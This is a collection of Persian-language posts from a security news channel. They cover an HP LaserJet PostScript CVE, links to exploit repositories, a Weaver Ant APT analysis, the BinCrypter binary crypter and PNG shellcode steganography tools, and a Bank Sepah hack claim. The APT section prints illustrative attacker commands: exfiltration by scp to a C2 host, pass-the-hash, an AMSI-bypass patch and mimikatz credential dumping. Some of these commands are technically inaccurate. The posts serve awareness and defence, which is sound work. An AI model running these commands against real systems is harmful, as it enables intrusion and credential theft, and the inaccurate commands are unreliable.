CVE-2025-26506
یک آسیب‌پذیری امنیتی است که در پرینترهای HP LaserJet Pro با قابلیت PostScript شناسایی شده است. این آسیب‌پذیری به دلیل وجود یک stack-based buffer overflow در پردازش کارهای چاپی PostScript ایجاد می‌شود. این نوع آسیب‌پذیری می‌تواند به مهاجمان اجازه دهد کدهای مخرب را اجرا کنند، کنترل دستگاه را به دست بگیرند یا باعث اختلال در عملکرد سیستم شوند.
توضیح آسیب‌پذیری:

- Stack-based buffer overflow:
این نوع آسیب‌پذیری زمانی رخ می‌دهد که داده‌های ورودی بیش از حد مجاز در بافر (ناحیه‌ای از حافظه) نوشته می‌شوند و باعث سرریز شدن به بخش‌های دیگر حافظه می‌گردند. در این حالت، مهاجم می‌تواند با ارسال داده‌های خاص، کنترل برنامه را به دست بگیرد.
- محل وقوع: این آسیب‌پذیری در پردازش فایل‌های PostScript در پرینترهای HP LaserJet Pro رخ می‌دهد.

راهکارهای امنیتی:
1. به‌روزرسانی فریم‌ور: HP معمولاً پس از شناسایی چنین آسیب‌پذیری‌هایی، به‌روزرسانی‌های امنیتی را منتشر می‌کند. کاربران باید آخرین نسخه‌ی فریم‌ور پرینتر خود را از وب‌سایت رسمی HP دانلود و نصب کنند.
2. محدود کردن دسترسی: دسترسی به پرینتر را تنها به کاربران و دستگاه‌های مورد اعتماد محدود کنید. از شبکه‌های امن و VLAN برای جداسازی پرینترها استفاده نمایید.
3. فیلتر کردن ترافیک شبکه: از فایروال‌ها یا سیستم‌های امنیتی شبکه برای فیلتر کردن ترافیک غیرضروری به سمت پرینتر استفاده کنید.
4. غیرفعال کردن قابلیت‌های غیرضروری: اگر نیازی به قابلیت PostScript ندارید، آن را در تنظیمات پرینتر غیرفعال کنید.

مراحل بهره‌برداری از این آسیب‌پذیری (برای اهداف آموزشی):
1. شناسایی دستگاه‌های آسیب‌پذیر: مهاجم ابتدا پرینترهای HP LaserJet Pro با قابلیت PostScript را در شبکه شناسایی می‌کند.
2. ارسال کار چاپی مخرب: مهاجم یک فایل PostScript مخرب ایجاد می‌کند که حاوی کدهای خاص برای ایجاد سرریز بافر است.
3. اجرای کد مخرب: اگر پرینتر آسیب‌پذیر باشد، کد مخرب اجرا شده و مهاجم می‌تواند کنترل دستگاه را به دست بگیرد یا باعث اختلال در عملکرد آن شود.

نکته مهم:

اگر از پرینترهای HP LaserJet Pro استفاده می‌کنید، حتماً وضعیت به‌روزرسانی فریم‌ور دستگاه خود را بررسی کنید و در صورت وجود وصله‌های امنیتی، آن‌ها را نصب نمایید.

@Pfksecurity

مجموعه ای از بیش از 500 ویدیو از 20 رویداد امنیتی فناوری اطلاعات

https://sectube.tv/

@Pfksecurity

🔍 کاوش NTDS.dit

این پست وبلاگ ساختار فایل NTDS.dit را بررسی می کند که داده ها را برای Active Directory ذخیره می کند. همچنین DIT Explorer را معرفی می کند، یک ابزار منبع باز جدید که برای تجزیه و تحلیل NTDS.dit طراحی شده است، و نشان می دهد که چگونه پایگاه داده را برای ارائه یک نمای ساختاریافته از دایرکتوری تفسیر می کند.

🔗 تحقیق:
https://trustedsec.com/blog/exploring-ntds-dit-part-1-cracking-the-surface-with-dit-explorer

🔗 منبع:
https://github.com/trustedsec/DitExplorer

#ad #windows #ntds #dnt
@PfkSecurity

مقدمه ای بر eBPF برای ویندوز

https://scorpiosoftware.net/2025/02/22/introduction-to-ebpf-for-windows/

@PfkSecurity

در این جلسه، تمرکز بر روی تاکتیک‌های تیم قرمز (Red Team) در زمینه اینترنت اشیاء (IoT) است. در ابتدا، اشاره می‌شود که دستگاه‌های روزمره مانند توسترها و توالت‌ها که نباید به اینترنت متصل شوند، در این بحث گنجانده نمی‌شوند. سخنران که یک تحلیل‌گر امنیتی در Black Hills Information Security است، بر اهمیت یادگیری و آموزش تکنیک‌های هک تأکید می‌کند.
توضیحات این ویدئو ادامه دارد در پایین بخوانید .
#RedTeam
@PfkSecurity

ابزارهایی مانند USB rubber duckies و LAN turtles به عنوان وسایلی برای گسترش قابلیت‌های تیم قرمز معرفی می‌شوند. Hack5 به عنوان یک سازمان کلیدی در تولید دستگاه‌های سخت‌افزاری برای تست نفوذ و تیم قرمز ذکر می‌شود. دو نوع اصلی حمله با استفاده از این دستگاه‌ها شناسایی می‌شود: حملات فرصت‌طلبانه و حملات دسترسی از راه دور.

سخنران به چالش‌های جمع‌آوری داده و خروج اطلاعات در سازمان‌های بزرگ با نظارت شبکه‌ای سختگیرانه اشاره می‌کند. همچنین، تکنولوژی‌های بی‌سیم مانند بلوتوث و Wi-Fi به عنوان روش‌های ممکن برای خروج داده‌ها مورد بحث قرار می‌گیرند، اما در محیط‌های امن ممکن است با چالش‌هایی مواجه شوند.

در ادامه، به تکنولوژی LoRa اشاره می‌شود که به دلیل مصرف کم انرژی و قابلیت‌های برد بلند، برای دستگاه‌های IoT مناسب است. همچنین، محدودیت‌هایی مانند اندازه حداکثر بسته ۲۵۵ بایتی LoRa نیز مطرح می‌شود. سخنران تجربیات خود را در طراحی مدارهای چاپی برای کنترل یک ماهواره شبیه‌سازی شده با استفاده از تکنولوژی LoRa به اشتراک می‌گذارد.

در بخش‌های بعدی، یک حمله USB rubber ducky به نمایش گذاشته می‌شود که شامل تزریق کلیدها برای باز کردن یک پست وبلاگ است. همچنین، استفاده از Raspberry Pi Zero با یک برد LoRaPi برای ارتباطات بی‌سیم و قابلیت‌های مختلف مورد بحث قرار می‌گیرد.

در نهایت، توصیه‌هایی برای جلوگیری از حملات فیزیکی و نظارت بر ترافیک شبکه ارائه می‌شود. تأکید بر اهمیت امنیت فیزیکی و انجام بازرسی‌های منظم برای شناسایی دستگاه‌های غیرمجاز نیز مطرح می‌شود. در کل، این جلسه به بررسی چالش‌ها و فرصت‌های موجود در زمینه امنیت IoT و تاکتیک‌های تیم قرمز می‌پردازد.

@Pfksecurity

بسته‌های Typosquatted Go Loader بدافزار را ارائه می‌کند که سیستم‌های لینوکس و macOS را هدف قرار می‌دهد

https://socket.dev/blog/typosquatted-go-packages-deliver-malware-loader

تجزیه و تحلیل بدافزار Stealc با باینری نینجا (جریان - 2025/02/25)

https://www.youtube.com/watch?v=zqVOhIK1cM8

نوروز سال ۲۵۸۴ پیروز

مراقب باش و هیچ نمونه‌ای را روی دستگاه اصلی خود اجرا نکن. آخرین چیزی که می‌خواهم این است که آسیبی به هیچ کامپیوتری وارد نشود. این موضوع ارتباطی با باج‌افزار Cryakl ندارد.

https://github.com/Cryakl
@PfkSecurity

Jasmin Ransomware - SQL Injection Login Bypass

https://www.exploit-db.com/exploits/52091

توضیحات :
 این مربوط به یک حفره امنیتی خطرناک در سیستم‌هایی است که از Jasmin Ransomware استفاده می‌کنند. این اکسپلویت به هکرها اجازه می‌دهد با دستکاری لاگین (SQL Injection)، بدون پسورد وارد سیستم قربانی شوند .

#exploit #poc #sql
@PfkSecurity

Totolink Router RCE
https://github.com/imnotaracistguys/Totolink-Router


این مربوط به یک حفره امنیتی خطرناک (RCE) در روترهای Totolink است که اجازه میدهد هکرها از راه دور کدهای مخرب اجرا کنند و کنترل کامل دستگاه را بگیرند

#github #exploit #IoT
@Pfksecurity

CVE-2025-1974 exploit

https://github.com/sandumjacob/IngressNightmare-POCs

یک حفره امنیتی خطرناک (CVE-2025-1974) با نام Ingress Nightmare است که اجازه میدهد هکرها از طریق یک آسیب‌پذیری در سیستم‌های هدف، دسترسی غیرمجاز بگیرند یا کنترل سیستم را در دست بگیرند!

@PfkSecurity

چینی APT گروه Weaver Ant بیش از چهار سال در شبکه یک ارائه دهنده خدمات ارتباطی فعالیت میکرد و با استفاده از روترهای Zyxel CPE که به خطر افتاده بودند، ترافیک و زیرساخت خود را پنهان میکرد.

محققان شرکت Sygnia توانستند رد این هکرها را پیدا کنند و چندین نسخه از بکدور China Chopper و یک شل وب سفارشی قبلاً ناشناخته به نام INMemory را کشف کردند که پیلودهای مفید را در حافظه میزبان اجرا میکند.

به گفته محققان، پس از آنکه مهاجم یک اپراتور بزرگ مخابراتی آسیایی را هدف قرار داد، ریشه کن کردن حضور آن به رغم تلاشهای متعدد برای خنثی سازی فعالیتهایش، کار بسیار دشواری بود.

Weaver Ant
برای نفوذ خود از شبکهای از بلوک های رله عملیاتی (ORB) استفاده کرد که عمدتاً شامل روترهای Zyxel CPE بودند و این امکان را فراهم میکرد تا ترافیک را پروکسی کرده و زیرساخت خود را پنهان نگه دارد.

مهاجم با استفاده از یک نسخه رمزگذاری شده با AES از شل وب China Chopper در شبکه مستقر شد که امکان مدیریت از راه دور سرور ها را فراهم میکرد و محدودیت های فایروال را دور میزد.

با پیشرفت عملیات، Weaver Ant به یک شل وب پیشرفته تر و سفارشی به نام INMemory روی آورد که از یک فایل DLL (eval.dll) برای اجرای پنهانی کد «Just-in-Time» (JIT) استفاده میکرد.

همانطور که Sygnia اشاره کرده، روشهای استخراج داده ها نیز توسط این APT به گونه ای انتخاب شده بود که کمترین شک را برانگیزد، از جمله ضبط غیرفعال ترافیک شبکه با استفاده از mirroring پورت.

به جای استقرار جداگانه وب شل ها، گروه Weaver Ant آنها را از طریق تکنیک "تونل زنی وب شل ها" به هم مرتبط کرد - روشی که پیشتر در حملات گروه مالی Elephant Beetle مشاهده شده بود.

این روش شامل انتقال ترافیک HTTP از یک سرور به سرور دیگر از طریق بخش های مختلف شبکه است که در واقع یک شبکه C2 پنهان درون زیرساخت قربانی ایجاد میکند.

هر وب شل به عنوان یک پروکسی عمل کرده و پیلود های تو در تو و رمزنگاری شده را به وب شل های دیگر منتقل میکند تا به صورت مرحله ای درون شبکه اجرا شوند.

این رویکرد به Weaver Ant اجازه میداد روی سرورهای بخش های مختلف شبکه فعالیت کند.

بیشتر این سرورها، سیستم های داخلی بدون اتصال به اینترنت بودند که از طریق سرورهای دارای دسترسی اینترنتی (به عنوان دروازههای عملیاتی) قابل دسترسی میشدند.

یافته های Sygnia نشان میدهد Weaver Ant به صورت افقی در شبکه حرکت میکرد و از منابع اشتراکی SMB و حساب های دارای دسترسی بالا استفاده میکرد که سالها با یک رمز عبور ثابت (اغلب با هش NTLM) کار میکردند.

در طول چهار سال جاسوسی سایبری، هکرها فایل های پیکربندی، لاگ های دسترسی و اعتبارنامه ها را سرقت کردند تا محیط را نقشه برداری و سیستمهای ارزشمند را شناسایی کنند.

آنها مکانیسم های ثبت رویداد را غیرفعال میکردند، از جمله اصلاح ETW (ردیابی رویدادهای ویندوز) و دور زدن AMSI (با بازنویسی تابع AmsiScanBuffer در ماژول amsi.dll) تا حجم بدافزار را کاهش داده و مدت طولانی تری بدون شناسایی بمانند.

محققان Weaver Ant را یک APT حرفه ای و باتجربه میدانند که قادر به حفظ دسترسی بلندمدت به شبکه قربانی برای عملیات جاسوسی سایبری است.

این انتساب بر اساس استفاده از روترهای Zyxel (که در برخی مناطق جغرافیایی محبوب هستند)، بکدورهای مرتبط با گروههای چینی و ساعات فعالیت گروه (مطابق با ساعت گرینویچ +8) انجام شده است.

به نظر میرسد تمرکز مهاجمان بیشتر بر شناسایی شبکه، جمعآوری اعتبارنامه ها و حفظ دسترسی پایدار به زیرساختهای مخابراتی بوده تا سرقت دادههای کاربری یا مالی.

@PfkSecurity

تحلیل حمله APT گروه Weaver Ant:

1. روش‌های نفوذ و تداوم حضور (TTPs):

    الف. استفاده از روترهای Zyxel CPE به‌عنوان نقاط رله (ORB):

        دستورهای احتمالی مهاجم:

        bash

        # تغییر تنظیمات روتر برای ایجاد پروکسی مخفی
        iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination <C2_IP>:80

        هدف: مخفی کردن ترافیک C2 در ترافیک عادی شبکه.

    ب. استقرار وب‌شل‌های چندلایه (China Chopper + INMemory):

        دستورهای احتمالی:

        powershell
        # اجرای پیلود در حافظه (JIT) با استفاده از PowerShell
        Invoke-ReflectivePEInjection -DLLPath eval.dll -FunctionName "MaliciousEntry"

        هدف: فرار از تشخیص آنتی‌ویروس با عدم ذخیره فایل روی دیسک.

    ج. تونل‌زنی وب‌شل‌ها (Shell Tunneling):

        دستورهای احتمالی:

        bash
        # انتقال ترافیک از طریق وب‌شل‌های زنجیره‌ای
        curl -X POST -H "Cookie: SessionID=Hacked" --data "payload=<encrypted>" https://InternalServer/transfer

        هدف: ایجاد ارتباط پنهان بین سرورهای داخلی.

2. حرکت جانبی (Lateral Movement):

    الف. سوءاستفاده از SMB و NTLM هش:

        دستورهای احتمالی:

        bash
        # استفاده از Pass-the-Hash برای دسترسی به سیستم‌های دیگر
        psexec.py -hashes :<NTLM_Hash> [email protected]

        هدف: گسترش دسترسی بدون نیاز به رمز عبور .

    ب. استفاده از حساب‌های با دسترسی بالا:

        دستورهای احتمالی:

        powershell
        # جستجوی حساب‌های مدیر سیستم
        Get-WmiObject -Class Win32_UserAccount | Where-Object {$_.SID -like "S-1-5-21-*500"}

        هدف: افزایش دسترسی ها برای دسترسی به داده‌های حساس.

3. جمع‌آوری داده‌ها و فرار از تشخیص:

    الف. غیرفعال کردن ETW و AMSI:

        دستورهای احتمالی:

        powershell

        # توقف سرویس ETW
        Stop-Service -Name "EventLog" -Force
        # بازنویسی تابع AMSI
        [IntPtr]$amsiScanBufferAddr = Get-ProcAddress (Get-Module amsi.dll) "AmsiScanBuffer"
        $patch = [Byte[]] (0xC3, 0x80, 0x07, 0x00)
        [System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $amsiScanBufferAddr, 4)

        هدف: جلوگیری از ثبت فعالیت‌های مخرب.

    ب. سرقت فایل‌های پیکربندی و اعتبارنامه‌ها:

        دستورهای احتمالی:

        bash

        # کپی کردن فایل‌های تنظیمات شبکه
        scp /etc/network/interfaces attacker@C2_IP:/stolen_data
        # استخراج اعتبارنامه‌ها از حافظه
        mimikatz.exe "sekurlsa::logonpasswords" "exit"

        هدف: نقشه‌برداری از شبکه و دسترسی به سیستم‌های کلیدی.

4. روش‌های عملی برای دفاع (Mitigation):

    الف. نظارت بر روترهای Zyxel CPE:

        بررسی لاگ‌های دسترسی غیرعادی به پورت‌های مدیریتی.

        به‌روزرسانی فریم‌ور روترها برای رفع آسیب‌پذیری‌ها.

    ب. محدود کردن دسترسی SMB و NTLM:

        فعال‌سازی احراز هویت چندعاملی (MFA) برای حساب‌های حساس.

        غیرفعال کردن NTLM و استفاده از Kerberos.

    ج. نظارت بر فعالیت‌های غیرعادی در حافظه:

        استفاده از ابزارهایی مانند Sysmon برای ردیابی تزریق کد (Code Injection).

        مانیتورینگ فراخوانی توابع eval.dll یا ماژول‌های ناشناخته.

    د. جداسازی شبکه (Network Segmentation):

        محدود کردن ارتباط بین سرورهای داخلی و اینترنت با فایروال.

        استفاده از میکروسگمنتیشن برای کنترل ترافیک شرکتی.

نتیجه‌گیری:

    Weaver Ant
یک APT پیشرفته با تمرکز بر جاسوسی بلندمدت است که از تکنیک‌های زیر استفاده می‌کند:

        پنهان‌سازی ترافیک در دستگاه‌های شبکه (روترهای Zyxel).

        اجرای کد در حافظه (JIT) برای فرار از تشخیص.

        حرکت جانبی با سوءاستفاده از اعتبارنامه‌های ضعیف.

    راهکار دفاعی: ترکیبی از نظارت پیشرفته (EDR/XDR)، حذف اعتبارنامه‌های قدیمی، و به‌روزرسانی مداوم سیستم‌ها.

@PfkSecurity

https://github.com/xforcered/ForsHops


 یک ابزار اثبات مفهوم (PoC) برای حرکت جانبی (Lateral Movement) بدون فایل است که از COM Objects به Trapped در سیستم‌های ویندوزی سوءاستفاده می‌کند. این روش به مهاجمان اجازه می‌دهد بدون نیاز به نوشتن فایل روی دیسک، در شبکه پخش شوند و کنترل سیستم‌های دیگر را به دست آورند .

تکنیک‌های کلیدی که بهش میشه اشاره کرد :
Fileless Execution (اجرای بدون فایل):

کد مخرب مستقیماً در حافظه (RAM) اجرا می‌شود.

از COM Objects مانند MMC20.Application برای اجرای دستورات استفاده می‌کند.

Lateral Movement (حرکت جانبی):

با استفاده از WMI یا DCOM، حمله به سیستم‌های دیگر در همان شبکه انجام می‌شود.
نیازی به دانلود فایل اجرایی روی سیستم قربانی ندارد.

پنهان‌کاری (Stealth):
از آنجایی که فایلی روی دیسک نوشته نمی‌شود، آنتی‌ویروس‌های سنتی آن را تشخیص نمی‌دهند.

لاگ‌های امنیتی کمتری تولید می‌کند.

 چرا ForsHops خطرناک است؟
✅ مقاوم در برابر تشخیص (Evasion):
از آنتی‌ویروس و EDRها فرار می‌کند.
✅ نیاز به دسترسی اولیه کم:
فقط نیاز به یک حساب کاربری با دسترسی محلی/دامنه دارد.
✅ قابلیت گسترش سریع در شبکه:
می‌تواند در چند ثانیه به سیستم‌های دیگر منتقل شود.

🚨 هشدار: این ابزار صرفاً برای آزمایشات امنیتی و تحقیقاتی است. استفاده غیرقانونی از آن پیگرد قانونی دارد!
@PfkSecurity

https://github.com/hackerschoice/bincrypter

تحلیل BinCrypter: رمزنگار زمان اجرای باینری لینوکس

معرفی BinCrypter

یک ابزار رمزنگاری باینری زمان اجرا (Runtime Binary Crypter) است که به زبان BASH نوشته شده و توسط تیم The Hacker's Choice (THC) توسعه داده شده است.

ویژگی‌های کلیدی که میشه بهش اشاره کرد :

1. عملکرد اصلی:
- رمزنگاری فایل‌های باینری لینوکس در زمان اجرا
- امکان اجرای باینری‌های رمزنگاری شده بدون نیاز به ذخیره‌سازی نسخه رمزگشایی شده روی دیسک

2. مزایا:
- نوشته شده در BASH (سبک و قابل حمل)
- عدم نیاز به کامپایل مجدد
- کار با اکثر باینری‌های لینوکس
- کاهش احتمال تشخیص توسط آنتی‌ویروس

موارد استفاده

1. کاربردهای امنیتی:
- محافظت از باینری‌های حساس
- کاهش حملات معکوس‌سازی (Reverse Engineering)
- افزایش امنیت نرم‌افزارهای اختصاصی

2. کاربردهای مخرب احتمالی:
- پنهان‌سازی بدافزارها
- دور زدن سیستم‌های تشخیص نفوذ
- حملات پیشرفته پایدار (APT)

## معماری فنی

graph TD
    A[باینری اصلی] --> B[فرآیند رمزنگاری]
    B --> C[باینری رمز شده]
    C --> D[لودر رمزگشا]
    D --> E[اجرا در حافظه]

نحوه استفاده پایه

# رمزنگاری یک باینری
./bincrypter -e /path/to/original_binary -o encrypted_binary

# اجرای باینری رمز شده
./encrypted_binary

## ملاحظات امنیتی

1. محدودیت‌ها:
- عدم محافظت در برابر دیباگرهای سطح هسته
- آسیب‌پذیر در برابر آنالیز حافظه
- عدم پشتیبانی از تمام معماری‌های CPU

2. راهکارهای تشخیص:
- آنالیز رفتار زمان اجرا
- مانیتورینگ فعالیت‌های غیرعادی حافظه
- استفاده از راهکارهای EDR پیشرفته

## نکته اخلاقی

توسعه و استفاده از چنین ابزارهایی برای اهداف مخالف قوانین جرم محسوب می‌شود. این اطلاعات صرفاً برای آگاهی متخصصان امنیت و تحقیقات دفاعی ارائه شده است.

@PfkSecurity

تحلیل حمله‌ی اخیر به بانک سپه ایران

دو حالت برای برسی وجود دارد؛
۱. هک واقعی؟ یا
۲. پروپاگاندای رسانه‌ای؟

پیش از تحلیل دو سناریوی مذکور، باید اشاره کنم که چنین حملات سایبری را نباید صرفا از بُعد فنی تحلیل کرد، بلکه پدیده‌ای اجتماعی-امنیتی است که بازتاب‌های گسترده‌ای در جامعه ایجاد کرده است، پس باید چند بُعدی آن را تحلیل کرد،‌ اما چرا؛
به این دلیل که تیم CodeBreakers یا تیم‌های دیگر، از یک بستر برای تعامل با جامعه استفاده می‌کنند، که تیم مذکور از یک کانال تلگرامی استفاده کرده است، پس باید ابعاد اجتماعی آن هم بررسی شود.

سیر رخداد‌ها را کنار هم بگذاریم تا مانند پازل کامل شود؛

حمله توسط تیم CodeBreakers رخ می‌دهد، و در کانال تلگرامی آن‌ها اعلام می‌شود، و حتی در یک پیامی، حمله را از بُعد فنی شرح می‌دهند، اما اگر؛ حمله واقعی باشد بانک باید گزارش فنی رسمی را منتشر کند، اما آیا دلیلی دارد که این کار را نکند؟ باید مزایا و معایب آن را برسی کنیم.

الف) مزایای انتشار گزارش:
۱. انتشار گزارش فنی می‌تواند به بازیابی اعتماد عمومی منجر شود، چرا که شفافیت نشان‌دهنده مسئولیت‌پذیری سازمان است.
۲. این گزارش به عنوان یک ابزار اشتراک تهدید (Threat Intelligence Sharing) برای سایر نهادهای مالی عمل کرده و از حملات مشابه پیشگیری می‌کند.

ب) معایب و ریسک‌های انتشار:
۱. احتمال بروز رفتار‌های جمعی محتمل است مانند برداشت‌های پول از حساب‌های بانکی، که یک بحران اجتماعی محسوب می‌شود.
۲. افشای جزئیات ممکن است سایر گروه‌های خرابکار را تحریک به حملات مشابه کند، که به نوعی به تشدید تهدیدات دامن می‌زند.

به طوری‌ کلی الویت‌ها باعث می‌شود یک سازمان گزارش رسمی را به صورت عمومی منتشر کند یا خیر، برای همین نمی‌توان نظری قطعی داد، حداقل من نمی‌توانم در مورد آن نظری بدهم.

به نقل از فارس، رضا همدانچی، رئیس اداره روابط عمومی بانک سپه در واکنش به ادعای گروه هکری مذکور مدعی شد:

این ادعا از اساس کذب است و هیچگونه هک و نفوذی در بانک صورت نگرفته است. و سیستم‌های بانک سپه غیر قابل هک و نفوذ است. این ادعاهای کذب با هدف تشویش اذهان عمومی صورت می‌گیرد و مشتریان بانک سپه از این نظر خیالشان راحت باشد.

متاسفانه در حافظه‌ی مردم ایران، تکذیب یک رویداد از طرف مسئولین، مهر تائید بر آن است، این از رفتار غلط مسئولین در مواجه با مسائل مختلف سیاسی، اقتصادی، امنیتی-نظامی نشئت گرفته است.

اما در این ادعا به وضوح خواهید دید که تشویش اذهان عمومی، یکی از مهم‌ترین نگرانی‌های بانک سپه است و عملا آن را یک پروپاگاندای رسانه‌ای می‌داند یا شاید سعی می‌کند تهدید واقعی را اینطور تقلیل دهد، اما یک گزاره وجود دارد که باید بیشتر بررسی شود؛

سیستم‌های بانک سپه غیر قابل هک و نفوذ است.

گزاره‌ای که آقای همدانچی آن را بیان کرد، آیا درست است؟ قطعا خیر، این جمله اساسا نادرست است، ما از آقای همدانچی انتظاری نداریم، اما آیا بهتر نبود با تیم فنی هماهنگ شود؟ آیا این هماهنگی صورت گرفته است؟ این جمله غیرحرفه‌ای است و نتیجه‌ی آن بی‌اعتمادی را در پی دارد.

به هر روی، حتی اگر گزارش فنی و رسمی منتشر نمی‌شود که حتی دلایل آن را بیان کردیم، باید یک بیانه‌‌ای مفصل‌تری ارائه شود تا جامعه سردرگم نشود، تا مجبور شود از رسانه‌ی تیم هکری خوراک فکری را تهیه کند، و در رسانه روایت اول بسیار مهم است، شما باید تیم هکری را در روایت سازی خلع سلاح کنید، آیا کردید؟
آیا از ظرفیت رسانه‌ای برای پاسخ به شبهات استفاده کردید؟

هک چه واقعی باشد چه یک پروپاگاندای رسانه‌ای، چیزی که مسلم و قطعی است این است که شما بلد نیستید بحران را مدیریت کنید.

این ابزار یک پروژه است که نشان می‌دهد چگونه می‌توان پیلودهای شِل‌کد (Shellcode Payloads) را در فایل‌های تصویری مانند PNG جاسازی کرد. این کار با استفاده از زبان برنامه‌نویسی Python انجام می‌شود و سپس این پیلودها می‌توانند با استفاده از زبان‌های C/C++ از فایل تصویری استخراج شوند. پیلودها می‌توانند مستقیماً از فایل روی دیسک یا از تصویری که در بخش منابع باینری (.rsrc) ذخیره شده است، بازیابی شوند.

توضیحات بیشتر:
1. جاسازی پیلود در تصاویر (Steganography):
   - این ابزار از تکنیک‌های استگانوگرافی (Steganography) استفاده می‌کند تا داده‌های مخرب (مانند شِل‌کد) را در فایل‌های تصویری مانند PNG پنهان کند. این کار با تغییر جزئی در پیکسل‌های تصویر انجام می‌شود، به طوری که تغییرات برای چشم انسان قابل تشخیص نیستند.
   - فایل تصویری حاوی پیلود همچنان به عنوان یک تصویر معتبر قابل مشاهده است و می‌تواند بدون ایجاد شک منتقل شود.

2. استخراج پیلود:
   - پس از جاسازی پیلود در تصویر، این ابزار امکان استخراج پیلود را با استفاده از کدهای C/C++ فراهم می‌کند. این کار می‌تواند از طریق خواندن فایل تصویری از دیسک یا حتی از بخش منابع (.rsrc) یک فایل اجرایی (مانند یک برنامه) انجام شود.

3. کاربرد برای هکرها:
   - پنهان‌سازی بدافزار: هکرها می‌توانند از این تکنیک برای پنهان‌کردن بدافزارها در فایل‌های تصویری استفاده کنند. این فایل‌های تصویری می‌توانند به عنوان بخشی از یک حمله فیشینگ یا به عنوان یک فایل به ظاهر بی‌خطر ارسال شوند.
   - دور زدن آنتی‌ویروس: از آنجا که فایل تصویری به نظر بی‌خطر می‌رسد، ممکن است توسط آنتی‌ویروس‌ها به عنوان تهدید شناسایی نشود. این باعث می‌شود هکرها بتوانند بدافزار را بدون تشخیص به سیستم قربانی منتقل کنند.
   - اجرای کد از راه دور: پس از استخراج پیلود از تصویر، هکرها می‌توانند آن را اجرا کنند تا کنترل سیستم قربانی را به دست آورند یا اقدامات مخرب دیگری انجام دهند.

4. مثال عملی:
   - یک هکر می‌تواند یک تصویر PNG حاوی شِل‌کد را به عنوان یک فایل بی‌خطر (مثلاً یک عکس پروفایل) ارسال کند. هنگامی که قربانی این تصویر را دانلود می‌کند، یک برنامه مخرب می‌تواند پیلود را از تصویر استخراج و اجرا کند.

خطرات و اهداف مخرب:
- این ابزار می‌تواند برای اهداف مخرب مانند توزیع بدافزار، حملات فیشینگ، یا نفوذ به سیستم‌ها استفاده شود. از آنجا که فایل‌های تصویری به طور معمول غیرقابل اجرا هستند، این تکنیک می‌تواند باعث فریب کاربران و سیستم‌های امنیتی شود.

استفاده اخلاقی:
- این ابزار می‌تواند برای اهداف اخلاقی نیز استفاده شود، مانند تست نفوذ (Penetration Testing) یا ارزیابی امنیتی سیستم‌ها. با این حال، استفاده از آن برای اهداف مخرب غیرقانونی، غیراخلاقی است.

در کل، این ابزار یک نمونه از تکنیک‌های پیشرفته‌ای است که هکرها برای پنهان‌سازی و اجرای کدهای مخرب استفاده می‌کنند. آگاهی از چنین تکنیک‌هایی برای متخصصان امنیت سایبری ضروری است تا بتوانند در برابر چنین حملاتی دفاع کنند.

@PfkSecurity